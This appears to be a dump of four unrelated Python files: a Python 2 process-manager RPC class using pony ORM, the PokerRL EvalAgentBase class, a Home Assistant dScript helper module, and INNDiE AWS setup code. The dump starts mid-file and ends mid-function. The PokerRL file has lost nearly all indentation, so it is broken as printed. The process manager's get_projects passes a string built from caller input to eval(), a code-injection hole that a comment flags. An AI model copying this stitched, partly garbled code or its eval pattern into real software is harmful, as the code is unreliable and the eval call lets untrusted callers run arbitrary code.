        """Create a Template plus its per-process Project rows.

        `projects` is a JSON list of dicts with keys program, process_name,
        command, numprocess and port. Fails fast if a program already exists.
        """
        with db_session:
            projects = json.loads(projects)
            for project in projects:
                program = project.get("program")
                process_name = project.get("process_name")
                command = project.get("command")
                numprocess = int(project.get("numprocess"))
                port = int(project.get("port"))
                if Template.exists(program=program):
                    # Message text is Chinese: "program:<name> already exists".
                    return json.dumps(dict(
                        msg="program:{0}已经存在".format(program),
                        status="fail"
                    ))
                Template(**project)
                # One Project row per process; ports allocated sequentially
                # from `port`, substituted into name/command templates.
                for i in range(numprocess):
                    Project(
                        program=program,
                        process_name=process_name.format(port=i),
                        command=command.format(port=i + port),
                        port=i + port
                    )
            return json.dumps(dict(
                status="ok",
                msg=""
            ))

    def remove_projects(self, programs):
        """Delete the Templates and Projects for the given JSON list of programs."""
        with db_session:
            try:
                programs = json.loads(programs)
                delete(p for p in Template if p.program in programs)
                delete(p for p in Project if p.program in programs)
                return json.dumps(dict(
                    status="ok",
                    msg=""
                ))
            except Exception, e:
                return json.dumps(dict(
                    status="fail",
                    msg=e.message
                ))

    def get_projects(self, data):
        """Query Projects, optionally restricted to programs/fields.

        `data` is JSON with optional "programs" and "fields" lists. With
        neither, the first Project is returned; otherwise all matches.
        """
        from misc import gen_fields
        print data
        data = json.loads(data)
        programs = data.get("programs", [])
        fields = data.get("fields", [])
        with db_session:
            if programs or fields:
                # SECURITY: eval() on a string built from `fields` — safe only
                # if gen_fields sanitizes its input; do not expose to
                # untrusted callers without validation.
                res = eval("select({0} for p in Project {1})".format(
                    gen_fields('p', fields),
                    "" if not programs else "if p.program in programs"
                ))
            else:
                res = select(p for p in Project)
            _data = res[:] if programs or fields else res.first()
            if __debug__:
                print res.get_sql()
                print to_dict(_data)
            try:
                return json.dumps(dict(
                    status="ok",
                    data=to_dict(_data)
                ))
            except Exception, e:
                return json.dumps(dict(
                    status="fail",
                    msg=e.message
                ))

    def update_project(self, data):
        """Update one Template and rebuild its Project rows from scratch."""
        with db_session:
            try:
                data = json.loads(data)
                program = data.get("program")
                del data["program"]  # program is the key, not an updatable field
                Template[program].set(**data)
                # Drop and recreate the per-process rows with the new config.
                delete(p for p in Project if p.program == program)
                process_name = data.get("process_name")
                command = data.get("command")
                numprocess = int(data.get("numprocess"))
                port = int(data.get("port"))
                for i in range(numprocess):
                    Project(
                        program=program,
                        process_name=process_name.format(port=i),
                        command=command.format(port=i + port),
                        port=i + port
                    )
                return json.dumps(dict(
                    status="ok",
                    msg=""
                ))
            except Exception, e:
                return json.dumps(dict(
                    status="fail",
                    msg=e.message
                ))

    def do_actions(self, data):
        """Run start/stop/restart actions against the given programs.

        Returns fail (Chinese msg: "command incorrect") on an unknown
        action; otherwise ok with the last action executed.
        """
        data = json.loads(data)
        programs = data.get("programs", [])
        actions = data.get("actions", [])
        if __debug__:
            print data
            print programs, actions
        from project_action import start, stop, restart
        for action in actions:
            print action
            if action == u"start":
                start(programs)
            elif action == u"stop":
                stop(programs)
            elif action == u"restart":
                restart(programs)
            else:
                return json.dumps(dict(
                    status=u'fail',
                    msg=u'命令不正确'
                ))
        # NOTE(review): `action` here is the loop variable after the loop;
        # with an empty `actions` list this raises NameError — confirm
        # callers always send at least one action.
        return json.dumps(dict(
            status='ok',
            msg=action
        ))

    def ping(self):
        """Liveness probe."""
        return "ok"
if __name__ == '__main__':
    pass
# The block below is a bare module-level string literal: it is evaluated and
# discarded at import time and has no runtime effect. It reads as scratch
# notes on the pony.orm query API, kept for reference.
'''
db.insert("Person", name="Ben", age=33, returning='id')
x = "John"
data = db.select("* from Person where name = $x")
data = db.select("* from Person where name = $x", {"x" : "Susan"})
data = db.select("* from Person where name = $(x.lower()) and age > $(y + 2)")
select(c for c in Customer).order_by(Customer.name).limit(10)
g = Group[101]
g.students.filter(lambda student: student.gpa > 3)[:]
g.students.order_by(Student.name).page(2, pagesize=3)
g.students.order_by(lambda s: s.name).limit(3, offset=3)
Query.random()
select(p for p in Product if p.price > 100).for_update()
@db_session(retry=3)
def your_function():
    ...
update(p.set(price=price * 1.1) for p in Product if p.category.name == "T-Shirt")
delete(p for p in Product if p.category.name == "Floppy disk")
'''
|
<reponame>Jona-Gold/PokerRL
# Copyright (c) 2019 <NAME>
from PokerRL.rl import rl_util
from PokerRL.rl.MaybeRay import MaybeRay
from PokerRL.util.file_util import do_pickle, load_pickle
class EvalAgentBase:
"""
This baseclass should be subclassed by each agent/algorithm type. It is used to wrap the agent with his own
internal1 environment. It provides a standardized API for querying the agent for different things to the evaluators.
If an algorithm employs different agents for each seat on the table, this class should wrap all of them in one.
"""
ALL_MODES = NotImplementedError # Override with list of all modes
def __init__(self, t_prof, mode=None, device=None):
"""
Args:
t_prof (TrainingProfile):
mode: Any mode your algorithm's eval agent can be evaluated in. Specify modes
as class variables and pass one of them here. Can be changed later by calling
.to_mode(new_mode) on this instance
device (torch.device): The device the eval agent shall live and act on.
"""
self.t_prof = t_prof
self.ray = MaybeRay(runs_distributed=t_prof.DISTRIBUTED, runs_cluster=t_prof.CLUSTER)
self.env_bldr = rl_util.get_env_builder(t_prof=t_prof)
self._internal_env_wrapper = self.env_bldr.get_new_wrapper(is_evaluating=True, stack_size=None)
self._mode = mode
if device is None:
self.device = self.t_prof.device_inference
else:
self.device = device
# __________________________________________________ Query agents __________________________________________________
def get_a_probs_for_each_hand(self):
"""
Returns:
np.ndarray(RANGE_SIZE, N_ACTIONS): the action probabilities for each hand
"""
raise NotImplementedError
def get_a_probs(self):
"""
Returns:
np.ndarray(N_ACTIONS): action probs for hand currently held in current state
"""
raise NotImplementedError
def get_action(self, step_env=True, need_probs=False):
"""
Args:
step_env (bool): Whether the internal env shall be stepped
need_probs (bool): Whether the action probabilities for all hands shall be returned too
Returns:
action,
action probs for each hand (or None if not need_probs)
"""
raise NotImplementedError
def state_dict(self):
""" Override and keep base as one field! """
return {
"t_prof": self.t_prof,
"mode": self._mode,
"env": self._internal_env_wrapper.state_dict(),
"agent": self._state_dict(),
}
def load_state_dict(self, state):
self._internal_env_wrapper.load_state_dict(state["env"])
self._mode = state["mode"]
self._load_state_dict(state["agent"])
def _state_dict(self):
# Implement your agent's state_dict
raise NotImplementedError
def _load_state_dict(self, state):
# Implement your agent's load_state_dict
raise NotImplementedError
def update_weights(self, weights_for_eval_agent):
"""
Args:
weights_for_eval_agent: Can be any algorithm-specific data; e.g. Neural Network parameters for the agent
"""
raise NotImplementedError
def can_compute_mode(self):
"""
Returns:
bool: Whether whatever condition is satisfied (e.g. for delayed CFR+ whether enough
iterations have passed) to evaluate the algorithm with self._mode
"""
raise NotImplementedError
# _____________________________________________________ State ______________________________________________________
def set_stack_size(self, stack_size):
self._internal_env_wrapper.env.set_stack_size(stack_size=stack_size)
def get_mode(self):
return self._mode
def set_mode(self, mode):
assert mode in self.ALL_MODES
self._mode = mode
def set_env_wrapper(self, env_wrapper):
self._internal_env_wrapper = env_wrapper
def get_env_wrapper(self):
return self._internal_env_wrapper
def set_to_public_tree_node_state(self, node):
self._internal_env_wrapper.set_to_public_tree_node_state(node=node)
# __________________________________________________ Notifications _________________________________________________
def notify_of_action(self, p_id_acted, action_he_did):
    """Mirror another player's action into the internal env."""
    # Sanity check: the internal env must agree on whose turn it is.
    assert self._internal_env_wrapper.env.current_player.seat_id == p_id_acted
    self._internal_env_wrapper.step(action=action_he_did)
def notify_of_processed_tuple_action(self, p_id_acted, action_he_did):
    """Mirror another player's already-processed tuple action into the internal env."""
    assert self._internal_env_wrapper.env.current_player.seat_id == p_id_acted
    self._internal_env_wrapper.step_from_processed_tuple(action=action_he_did)
def notify_of_raise_frac_action(self, p_id_acted, frac):
    """ this fn is only useful to call if current_player wants to raise. Therefore it assumes that's the case. """
    assert self._internal_env_wrapper.env.current_player.seat_id == p_id_acted
    self._internal_env_wrapper.step_raise_pot_frac(pot_frac=frac)
def notify_of_reset(self):
    """Reset the internal env and clear its recorded observations."""
    self._internal_env_wrapper.reset()
    self._internal_env_wrapper._list_of_obs_this_episode = []  # from .reset() the first obs is in by default
def reset(self, deck_state_dict=None):
    """Reset the internal env, optionally seeding the deck from a state dict."""
    self._internal_env_wrapper.reset(deck_state_dict=deck_state_dict)
# ___________________________________________________ Store State __________________________________________________
def env_state_dict(self):
    """Return only the internal env's snapshot."""
    return self._internal_env_wrapper.state_dict()
def load_env_state_dict(self, state_dict):
    """Restore only the internal env from a snapshot."""
    self._internal_env_wrapper.load_state_dict(state_dict)
def store_to_disk(self, path, file_name):
    """Pickle the full agent snapshot to ``path/file_name``."""
    do_pickle(obj=self.state_dict(), path=path, file_name=file_name)
@classmethod
def load_from_disk(cls, path_to_eval_agent):
    """Alternate constructor: rebuild an agent from a pickled snapshot on disk."""
    snapshot = load_pickle(path=path_to_eval_agent)
    agent = cls(t_prof=snapshot["t_prof"])
    agent.load_state_dict(state=snapshot)
    return agent
|
"""dscriptmodule helper functions"""
from __future__ import annotations
from typing import Final
import logging
import asyncio
from homeassistant.core import HomeAssistant
from homeassistant.config_entries import ConfigEntry
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import (
CONF_BOARDS,
DATA_BOARDS,
DATA_ENTITIES,
DSDOMAIN_LIGHT,
DSDOMAIN_COVER,
DSDOMAIN_SWITCH,
DSDOMAIN_MOTION,
DSDOMAIN_BUTTON,
DSDOMAIN_BOARD,
DOMAIN,
)
_LOGGER: Final = logging.getLogger(__name__)
async def async_TopicToDomain(topic) -> str | None:
    """Async: map a dscript event topic to its Home Assistant platform (None if unknown)."""
    topic_to_domain = {
        'getlight': DSDOMAIN_LIGHT,
        'getsocket': DSDOMAIN_SWITCH,
        'getshutter': DSDOMAIN_COVER,
        'getmotion': DSDOMAIN_MOTION,
        'getbutton': DSDOMAIN_BUTTON,
    }
    return topic_to_domain.get(topic)
async def async_ProgrammingDebug(obj, show_all=False) -> None:
    """Async: log all attributes of a specific object.

    Args:
        obj: the object whose attributes are dumped to the debug log.
        show_all: if True, also include private ("_"-prefixed) attributes.
    """
    try:
        _LOGGER.debug("%s - async_ProgrammingDebug: %s", DOMAIN, obj)
        for attr in dir(obj):
            if attr.startswith('_') and not show_all:
                continue
            if hasattr(obj, attr):
                _LOGGER.debug("%s - async_ProgrammingDebug: %s = %s", DOMAIN, attr, getattr(obj, attr))
            # Yield to the event loop so dumping many attributes does not block it.
            await asyncio.sleep(0)
    except Exception as e:
        # Debug helper only: log and swallow so introspection failures never propagate.
        _LOGGER.error("%s - async_ProgrammingDebug: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
def ProgrammingDebug(obj, show_all=False) -> None:
    """Log all attributes of a specific object.

    Args:
        obj: the object whose attributes are dumped to the debug log.
        show_all: if True, also include private ("_"-prefixed) attributes.
    """
    try:
        _LOGGER.debug("%s - ProgrammingDebug: %s", DOMAIN, obj)
        for attr in dir(obj):
            if attr.startswith('_') and not show_all:
                continue
            if hasattr(obj, attr):
                _LOGGER.debug("%s - ProgrammingDebug: %s = %s", DOMAIN, attr, getattr(obj, attr))
    except Exception as e:
        # Debug helper only: log and swallow so introspection failures never propagate.
        _LOGGER.error("%s - ProgrammingDebug: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
async def async_getdSBoardByIP(hass: HomeAssistant, ip: str):
    """Get a board from the board list by its IP.

    Returns the matching board, or None when no board matches.
    """
    _LOGGER.debug("%s - async_getdSBoardByIP: %s", DOMAIN, ip)
    for dSBoard in hass.data[DOMAIN][DATA_BOARDS]:
        try:
            # Bug fix: compare against the 'ip' parameter. The original referenced
            # the undefined name 'IP', which raised NameError on every iteration
            # (silently swallowed below), so the lookup never matched any board.
            if dSBoard.IP == ip:
                return dSBoard
            await asyncio.sleep(0)
        except NameError as e:
            _LOGGER.debug("%s - async_getdSBoardByIP: known exception: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
            continue
        except Exception as e:
            _LOGGER.error("%s - async_getdSBoardByIP: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
            continue
    _LOGGER.debug("%s - async_getdSBoardByIP: cannot find board: %s", DOMAIN, ip)
    return None
async def async_getdSBoardByMAC(hass: HomeAssistant, mac: str):
    """Get a board from the board list by its MAC"""
    _LOGGER.debug("%s - async_getdSBoardByMAC: %s", DOMAIN, mac)
    # Normalize once; board MACs are lower-cased per comparison below.
    mac = mac.lower()
    for dSBoard in hass.data[DOMAIN][DATA_BOARDS]:
        try:
            if dSBoard._MACAddress.lower() == mac:
                return dSBoard
            # Yield to the event loop between boards.
            await asyncio.sleep(0)
        except NameError as e:
            # Tolerate boards missing expected attributes; skip and keep searching.
            _LOGGER.debug("%s - async_getdSBoardByMAC: known exception: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
            continue
        except Exception as e:
            _LOGGER.error("%s - async_getdSBoardByMAC: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
            continue
    _LOGGER.debug("%s - async_getdSBoardByMAC: cannot find board: %s", DOMAIN, mac)
    return None
async def async_getdSEntityByID(hass: HomeAssistant, dSBoardIP: str, identifier: int, domain: str):
    """Async: Gets a dScript Entity from list by providing its dSBoard IP, board-internal identifier and domain.

    Returns the matching entity, or None when no entity matches.
    """
    _LOGGER.debug("%s - async_getdSEntityByID: %s | %s | %s", DOMAIN, dSBoardIP, str(identifier), domain)
    for dSDevice in hass.data[DOMAIN][DATA_ENTITIES]:
        try:
            # An entity is unique per (board IP, board-internal id, platform domain).
            if dSDevice._board.IP == dSBoardIP and dSDevice._identifier == identifier and dSDevice._domain == domain:
                return dSDevice
            # Yield to the event loop between entities.
            await asyncio.sleep(0)
        except NameError as e:
            _LOGGER.debug("%s - async_getdSEntityByID: known exception: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
            continue
        except Exception as e:
            _LOGGER.error("%s - async_getdSEntityByID: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
            continue
    _LOGGER.debug("%s - async_getdSEntityByID: cannot find device: %s | %s | %s", DOMAIN, dSBoardIP, str(identifier), domain)
    return None
async def async_getdSEntityByEntityID(hass: HomeAssistant, entity_id: str):
    """Async: Gets a dScript Entity from list by providing its entity_id.

    Returns the matching entity, or None when not found or on failure.
    """
    try:
        _LOGGER.debug("%s - async_getdSEntityByEntityID: %s", DOMAIN, entity_id)
        entity=None
        for device in hass.data[DOMAIN][DATA_ENTITIES]:
            if device.entity_id == entity_id:
                entity=device
                break
            # Yield to the event loop between entities.
            await asyncio.sleep(0)
        if entity is None:
            _LOGGER.debug("%s - async_getdSEntityByEntityID: cannot find entity: %s", DOMAIN, entity_id)
            return None
        _LOGGER.debug("%s - async_getdSEntityByEntityID: found entity: %s", DOMAIN, entity._name)
        return entity
    except Exception as e:
        _LOGGER.error("%s - async_getdSEntityByEntityID: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
        # Bug fix: return None (not False). Callers test the result with "is None",
        # so returning False on error was treated as "entity exists".
        return None
async def async_setupPlatformdScript(platform, hass: HomeAssistant, config: ConfigEntry, async_add_entities: AddEntitiesCallback, discovery_info=None) -> None:
    """Wrapper to set up different dScriptModule platforms."""
    entites=[]
    try:
        _LOGGER.debug("%s - async_setupPlatformdScript: %s", DOMAIN, platform)
        # Initial setup walks all known boards; a discovery callback passes a single board.
        if discovery_info is None:
            boards=hass.data[DOMAIN][DATA_BOARDS]
            _LOGGER.debug("%s - async_setupPlatformdScript: using DATA_BOARDS %s", DOMAIN, boards)
        else:
            boards=[ discovery_info ]
            _LOGGER.debug("%s - async_setupPlatformdScript: using discovery_info %s", DOMAIN, boards)
    except Exception as e:
        _LOGGER.error("%s - async_setupPlatformdScript: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
        return False
    _LOGGER.debug("%s - async_setupPlatformdScript: %s boards to process", DOMAIN, len(boards))
    for dSBoard in boards:
        try:
            _LOGGER.debug("%s - async_setupPlatformdScript: %s", dSBoard.friendlyname, platform)
            # Stock firmware only supports the basic switch/boardsensor platforms;
            # every other platform requires the custom firmware.
            if not dSBoard._CustomFirmeware and not platform =='switch' and not platform =='boardsensor':
                _LOGGER.warning("%s - async_setupPlatformdScript: platform %s requires custom firmware - do nothing", dSBoard.friendlyname, platform)
                continue
            # Pick the entity class and how many entities this board exposes for the platform.
            if platform == DSDOMAIN_LIGHT:
                from .light import dScriptLight
                boardEntities=dSBoard._ConnectedLights
            elif platform == DSDOMAIN_COVER:
                from .cover import dScriptCover
                boardEntities=dSBoard._ConnectedShutters
            elif platform == DSDOMAIN_SWITCH:
                from .switch import dScriptSwitch
                if dSBoard._CustomFirmeware: # If the board runs custom firmeware connect only switch devices as switch
                    boardEntities=dSBoard._ConnectedSockets
                else: # If the board runs default firmware connect all physical relays as switch
                    boardEntities=dSBoard._PhysicalRelays
            elif platform == DSDOMAIN_MOTION:
                from .sensor import dScriptMotionSensor
                boardEntities=dSBoard._ConnectedMotionSensors
            elif platform == DSDOMAIN_BUTTON:
                from .sensor import dScriptButtonSensor
                boardEntities=dSBoard._ConnectedButtons
            elif platform == DSDOMAIN_BOARD:
                from .sensor import dScriptBoardSensor
                boardEntities=1  # exactly one board-status sensor per board
            else:
                _LOGGER.error("%s - async_setupPlatformdScript: invalid platform %s", dSBoard.friendlyname, platform)
                return None
            _LOGGER.debug("%s - async_setupPlatformdScript: prepare %s %s entites", dSBoard.friendlyname, boardEntities, platform)
            # Create one entity per board-internal identifier (1-based).
            i=0
            while i < boardEntities:
                try:
                    i += 1
                    # entity = await async_getdSEntityByID(hass, dSBoard.IP, i, platform)
                    # if not entity is None:
                    #    _LOGGER.debug("%s - async_setupPlatformdScript: entity alreay exists: %s", dSBoard.friendlyname, entity._name)
                    #    continue # If the entity already exists do not recreate
                    _LOGGER.debug("%s - async_setupPlatformdScript: create new entity: %s%s", dSBoard.friendlyname, platform, str(i))
                    if platform == DSDOMAIN_LIGHT:
                        entity = dScriptLight(dSBoard, i, platform)
                    elif platform == DSDOMAIN_COVER:
                        entity = dScriptCover(dSBoard, i, platform)
                    elif platform == DSDOMAIN_SWITCH:
                        entity = dScriptSwitch(dSBoard, i, platform)
                    elif platform == DSDOMAIN_MOTION:
                        entity = dScriptMotionSensor(dSBoard, i, platform)
                    elif platform == DSDOMAIN_BUTTON:
                        entity = dScriptButtonSensor(dSBoard, i, platform)
                    elif platform == DSDOMAIN_BOARD:
                        entity = dScriptBoardSensor(dSBoard, i, platform)
                    else:
                        continue
                    # Deduplicate by entity name before registering.
                    entity_exist = await async_getdSEntityByEntityID(hass, entity._name)
                    if not entity_exist is None:
                        _LOGGER.warning("%s - async_setupPlatformdScript: a entity with the equal name / entity_id alreay exists: %s", dSBoard.friendlyname, entity._name)
                        continue
                    else:
                        hass.data[DOMAIN][DATA_ENTITIES].append(entity)
                        entites.append(entity)
                except Exception as e:
                    # One failed entity must not abort the rest of the board's entities.
                    _LOGGER.error("%s - async_setupPlatformdScript: failed to create %s%s: %s (%s.%s)", dSBoard.friendlyname, platform, i, str(e), e.__class__.__module__, type(e).__name__)
                await asyncio.sleep(0)
        except Exception as e:
            _LOGGER.error("%s - async_setupPlatformdScript: setup %s failed: %s (%s.%s)", dSBoard.friendlyname, platform, str(e), e.__class__.__module__, type(e).__name__)
            return False
    _LOGGER.info("%s - async_setupPlatformdScript: setup %s %s entitys", DOMAIN, len(entites), platform)
    if not entites:
        return None
    #async_add_entities(entites, update_before_add=True) #-> causes not NoEntitySpecifiedError
    async_add_entities(entites)
|
<reponame>wpilibsuite/INNDiE-cli
import json
import tempfile
import click
import boto3
import os.path
# Security-group rule allowing all traffic (any protocol/port, IPv4 and IPv6).
all_perm = {
    "FromPort": -1,
    "IpProtocol": "-1",
    "IpRanges": [{"CidrIp": "0.0.0.0/0"}],
    "Ipv6Ranges": [{"CidrIpv6": "::/0"}],
    "ToPort": -1
}
# Security-group rule allowing inbound HTTP (TCP port 80) from anywhere.
all_http_perm = {
    "FromPort": 80,
    "IpProtocol": "tcp",
    "IpRanges": [{"CidrIp": "0.0.0.0/0"}],
    "Ipv6Ranges": [{"CidrIpv6": "::/0"}],
    "ToPort": 80
}
def make_client(name, region):
    """Create a boto3 client for the given service, optionally pinned to a region.

    :param name: The boto3 service name (e.g. "ec2", "s3", "iam").
    :param region: The region, or `None` to pull the region from the environment.
    """
    kwargs = {} if region is None else {"region_name": region}
    return boto3.client(name, **kwargs)
def make_resource(name):
    """Create a boto3 resource for the given service, using the environment's region."""
    return boto3.resource(name)
def revoke_all_perms(sg):
    """
    Revokes all permissions from the SecurityGroup.
    :param sg: The SecurityGroup.
    """
    ingress = sg.ip_permissions
    if ingress:
        sg.revoke_ingress(IpPermissions=ingress)
    egress = sg.ip_permissions_egress
    if egress:
        sg.revoke_egress(IpPermissions=egress)
def ensure_ec2_gress(sg_id, region):
    """
    Rewrites the ingress and egress permissions for the SecurityGroup. All existing ingress and
    egress permissions are revoked. The permissions that INNDiE needs are authorized.
    :param sg_id: The SecurityGroup's GroupId.
    :param region: The region, or `None` to pull the region from the environment.
    :return: Nothing.
    """
    ec2 = boto3.resource('ec2', region_name=region)
    sg = ec2.SecurityGroup(sg_id)
    # Start from a clean slate, then allow all outbound and inbound HTTP only.
    revoke_all_perms(sg)
    sg.authorize_egress(IpPermissions=[all_perm])
    sg.authorize_ingress(IpPermissions=[all_http_perm])
def get_single_security_group(client, sg_name, desc):
    """
    Ensures that exactly one matching SecurityGroup exists. If there is one match, its GroupId is
    returned. If there is more than one match, a RuntimeError is raised. If there are no matches,
    a new SecurityGroup is made.
    :param client: The EC2 client to use.
    :param sg_name: The name of the SecurityGroup.
    :param desc: The description of the SecurityGroup, if it needs to be created.
    :return: The GroupId of the matching SecurityGroup.
    """
    response = client.describe_security_groups(
        Filters=[
            {
                "Name": "group-name",
                "Values": [sg_name]
            }
        ]
    )
    # The filter should already narrow the result, but match on the exact name to be safe.
    matches = [group for group in response["SecurityGroups"] if group["GroupName"] == sg_name]
    if len(matches) > 1:
        raise RuntimeError("Matched multiple security groups: {}".format(matches))
    if matches:
        # The SG already exists
        return matches[0]["GroupId"]
    created = client.create_security_group(
        Description=desc,
        GroupName=sg_name
    )
    return created["GroupId"]
def ensure_ec2_security_group(region):
    """
    Ensures that the EC2 SecurityGroup exists.
    :param region: The region, or `None` to pull the region from the environment.
    :return: The GroupId of the SecurityGroup.
    """
    sg_name = "inndie-autogenerated-ec2-sg"
    client = make_client("ec2", region)
    sg_id = get_single_security_group(client, sg_name, "INNDiE autogenerated for EC2.")
    # Always rewrite the rules so manual edits are reverted to the known-good set.
    ensure_ec2_gress(sg_id, region)
    return sg_id
def select_subnet(region):
    """
    Picks the first available subnet.
    :param region: The region, or `None` to pull the region from the environment.
    :return: The SubnetId.
    """
    client = make_client("ec2", region)
    # No filters: take whatever subnet AWS lists first.
    return client.describe_subnets(Filters=[])["Subnets"][0]["SubnetId"]
def ensure_role(client, role_name):
    """
    Ensures that a SINGLE matching IAM role exists. Throws a `RuntimeError` if there are multiple
    matching roles.
    :param client: The iam client to use.
    :param role_name: The name of the IAM role.
    :return: The ARN of the matching IAM role, or `None` if there was no matching role.
    """
    roles = client.list_roles(PathPrefix="/")["Roles"]
    matching_roles = [it for it in roles if it["RoleName"] == role_name]
    if len(matching_roles) == 1:
        return matching_roles[0]["Arn"]
    elif len(matching_roles) > 1:
        # Bug fix: the original format string had one placeholder but two arguments,
        # so the matching roles were silently dropped from the message.
        raise RuntimeError("Found multiple roles matching {}: {}".format(role_name, matching_roles))
    else:
        return None
def ensure_ec2_role(region, role_name="inndie-autogenerated-ec2-role"):
    """
    Ensures the EC2 role exists. Creates the role if it does not exist.
    :param region: The region, or `None` to pull the region from the environment.
    :param role_name: The name of the role to ensure.
    :return: The role Arn.
    """
    client = make_client("iam", region)
    role_arn = ensure_role(client, role_name)
    if role_arn is None:
        # Need to create the role
        role = client.create_role(
            Path="/",
            RoleName=role_name,
            # Trust policy: only EC2 instances may assume this role.
            AssumeRolePolicyDocument=json.dumps({
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "ec2.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            })
        )["Role"]
        role_arn = role["Arn"]
        # Grant the newly created role full S3 access (training data and results).
        client.attach_role_policy(RoleName=role_name,
                                  PolicyArn="arn:aws:iam::aws:policy/AmazonS3FullAccess")
    return role_arn
def ensure_ec2_instance_profile(region, profile_name="inndie-autogenerated-ec2-instance-profile",
                                role_name="inndie-autogenerated-ec2-role"):
    """
    Ensures the EC2 instance profile exists and has the EC2 role attached.
    :param region: The region, or `None` to pull the region from the environment.
    :param profile_name: The name of the instance profile to ensure.
    :param role_name: The name of the role to ensure.
    :return: The instance profile Arn.
    """
    client = make_client("iam", region)
    iam_resource = make_resource('iam')
    # Get or create the instance profile. Catch only the "does not exist" error so
    # real failures (auth errors, throttling, etc.) propagate instead of silently
    # triggering a create attempt (the original used a bare except).
    try:
        local_profile = client.get_instance_profile(InstanceProfileName=profile_name)
    except client.exceptions.NoSuchEntityException:
        local_profile = client.create_instance_profile(InstanceProfileName=profile_name)
    instance_profile = iam_resource.InstanceProfile(
        local_profile['InstanceProfile']['InstanceProfileName'])
    if role_name not in [role.name for role in instance_profile.roles]:
        # Add the role if it does not exist
        instance_profile.add_role(RoleName=role_name)
    return instance_profile.arn
def ensure_s3_bucket(region):
    """
    Ensures that a matching S3 bucket exists.
    :param region: The region, or `None` to pull the region from the environment.
    :return: The name of the bucket.
    """
    client = make_client("s3", region)
    prefix = "inndie-autogenerated-"  # Used to identify the bucket that INNDiE manages

    def get_inndie_bucket():
        # Return the name of the first bucket carrying the INNDiE prefix, or None.
        buckets = client.list_buckets()["Buckets"]
        # Return the first matching bucket name, if there is one
        for bucket in buckets:
            if bucket["Name"].startswith(prefix):
                return bucket["Name"]
        return None

    inndie_bucket = get_inndie_bucket()
    if inndie_bucket is not None:
        return inndie_bucket
    # There is no matching bucket name, so create a new one
    import random
    import string
    # NOTE(review): this loop always returns on its first iteration; the outer
    # `while True` only matters if an exception path were added later.
    while True:
        # Bucket names are globally unique, so append a random lowercase suffix.
        bucket_name = prefix + ''.join(
            random.choice(string.ascii_lowercase + string.digits) for _ in range(30))
        # If the user wants a region in this list, we need to set it
        if region in ['EU', 'eu-west-1', 'us-west-1', 'us-west-2',
                      'ap-south-1', 'ap-southeast-1', 'ap-southeast-2',
                      'ap-northeast-1', 'sa-east-1', 'cn-north-1',
                      'eu-central-1']:
            client.create_bucket(ACL='private', Bucket=bucket_name,
                                 CreateBucketConfiguration={'LocationConstraint': region})
        else:
            # Otherwise the region will be us-east-1
            client.create_bucket(ACL='private', Bucket=bucket_name)
        # Busy loop until the bucket is created. Otherwise, we will set the public access block
        # too early and its configuration will be lost
        while True:
            inndie_bucket = get_inndie_bucket()
            if inndie_bucket is not None:
                break
        # Lock the bucket down: block every form of public access.
        client.put_public_access_block(Bucket=bucket_name, PublicAccessBlockConfiguration={
            'BlockPublicAcls': True,
            'IgnorePublicAcls': True,
            'BlockPublicPolicy': True,
            'RestrictPublicBuckets': True
        })
        return bucket_name
def impl_ensure_configuration(region):
    """
    Ensures all the configuration INNDiE needs is in place.
    :param region: The region, or `None` to pull the region from the environment.
    """
    # Order matters loosely: bucket and security group are independent, but the
    # instance profile expects the role to exist (both use the same default name).
    ensure_s3_bucket(region)
    ensure_ec2_security_group(region)
    ensure_ec2_role(region)
    ensure_ec2_instance_profile(region)
def impl_upload_model(model_path, bucket_name, region):
    """
    Uploads a model to S3.
    :param model_path: The file path to the model to upload, ending with the name of the model.
    :param bucket_name: The S3 bucket name.
    :param region: The region, or `None` to pull the region from the environment.
    """
    s3 = make_client("s3", region)
    # Models live under a fixed prefix, keyed by file name only.
    key = "inndie-models/" + os.path.basename(model_path)
    s3.upload_file(model_path, bucket_name, key)
    print(f"Uploaded to: {key}\n")
def impl_download_model(model_path, bucket_name, region):
    """
    Downloads a model from S3.
    :param model_path: The file path to download to, ending with the name of the model.
    :param bucket_name: The S3 bucket name.
    :param region: The region, or `None` to pull the region from the environment.
    """
    s3 = make_client("s3", region)
    # The remote key is derived from the local file name under the models prefix.
    key = "inndie-models/" + os.path.basename(model_path)
    s3.download_file(bucket_name, key, model_path)
    print(f"Downloaded from: {key}\n")
def impl_download_training_script(script_path, bucket_name, region):
    """
    Downloads a training script from S3.
    :param script_path: The file path to download to, ending with the name of the script.
    :param bucket_name: The S3 bucket name.
    :param region: The region, or `None` to pull the region from the environment.
    """
    s3 = make_client("s3", region)
    # Training scripts live under their own fixed prefix.
    key = "inndie-training-scripts/" + os.path.basename(script_path)
    s3.download_file(bucket_name, key, script_path)
    print(f"Downloaded from: {key}\n")
def impl_upload_dataset(dataset_path, bucket_name, region):
    """
    Uploads a dataset to S3.
    :param dataset_path: The file path to the dataset to upload, ending with the name of the
    dataset.
    :param bucket_name: The S3 bucket name.
    :param region: The region, or `None` to pull the region from the environment.
    """
    s3 = make_client("s3", region)
    # Datasets live under a fixed prefix, keyed by file name only.
    key = "inndie-datasets/" + os.path.basename(dataset_path)
    s3.upload_file(dataset_path, bucket_name, key)
    print(f"Uploaded to: {key}\n")
def impl_download_dataset(dataset_path, bucket_name, region):
    """
    Downloads a dataset from S3.
    :param dataset_path: The file path to download to, ending with the name of the dataset.
    :param bucket_name: The S3 bucket name.
    :param region: The region, or `None` to pull the region from the environment.
    """
    s3 = make_client("s3", region)
    # The remote key is derived from the local file name under the datasets prefix.
